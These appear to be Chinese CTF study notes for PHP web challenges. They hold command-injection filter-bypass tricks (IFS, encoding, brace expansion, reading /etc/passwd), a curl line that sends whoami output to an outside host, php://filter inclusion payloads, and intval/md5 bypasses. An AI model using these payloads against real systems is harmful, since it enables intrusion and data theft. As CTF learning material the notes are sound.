前言
unseping
php反序列化魔术方法:
https://www.cnblogs.com/byErichas/p/14989539.html
https://blog.csdn.net/m0_69637056/article/details/125692222
https://blog.csdn.net/weixin_44576725/article/details/124050658
https://blog.csdn.net/solitudi/article/details/113588692
https://www.freebuf.com/news/209975.html
序列化时方法不参与,但是注意魔术方法如构造函数__construct, 在对象初始化时变量赋初值
命令执行绕过
1.正则校验时如过滤cat|flag|ls
,在字符串中插入空的环境变量绕过如'l${Z}s'
,并用 $${IFS}
代替空格
2.过滤绕过:分隔符编码(url、base64)绕过
3.八进制绕过:如ls: l对应assic码108 108->八进制:154: $(printf “\154\163”)//ls
4.十六进制绕过:echo "字符串转16进制的结果" | xxd -r -p|bash
//xxd:十六进制输出
5.linux内置分隔符:${IFS}$9、${IFS}、$IFS$9
6.使用重定向符: cat<>flag.php
7.$PS2:> $PS4:+
8.关键词拆分命令绕过:a=l;b=s;ab
9.控制环境变量绕过: echo $PATH得到/user/local… 要哪个字符截取哪个字符
echo ${PATH:1:1} ->u echo ${PATH:0:4} ->/usr
10.空值绕过:cat fl""ag cat fl''ag cat "fl""ag"
11.反斜杠绕过:ca\t flag l\s
12.空变量:x代表1-9如ca${7}t a.txt->cat a.txt,在没有传入参数的情况下,这些特殊字符默认为空
wh$1oami wh${1}oami
who$@ami who${@}ami
whoa$*mi whoa${*}mi
13.花括号:在linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag}
{cat,flag.php}
{cat,/etc/passwd}
{whoami,}
14.无回显的命令执行:可以通过curl命令将命令的结果输出到访问的url中
curl www.com/反引号whoami反引号
15.其他读文件命令
bash tac nl more less head tail vi cat bzmore bzless paste sort
16.参考链接
file_include
伪协议:php://filter/read=convert.base64/resource=flag.php
php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php
easyphp
php intval()函数:用于获取变量的整数值
绕过点1:if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){ echo intval(1e10);->1410065408 6e6->6000000
绕过点2:if(isset($b) && '8b184b' === substr(md5($b),-6,6)){ $b的md5值的后6位=8b184b python截取字符串后n位:print(last_md5[-6:])
fileclude
file_get_contents(php://input)
post:...
参考链接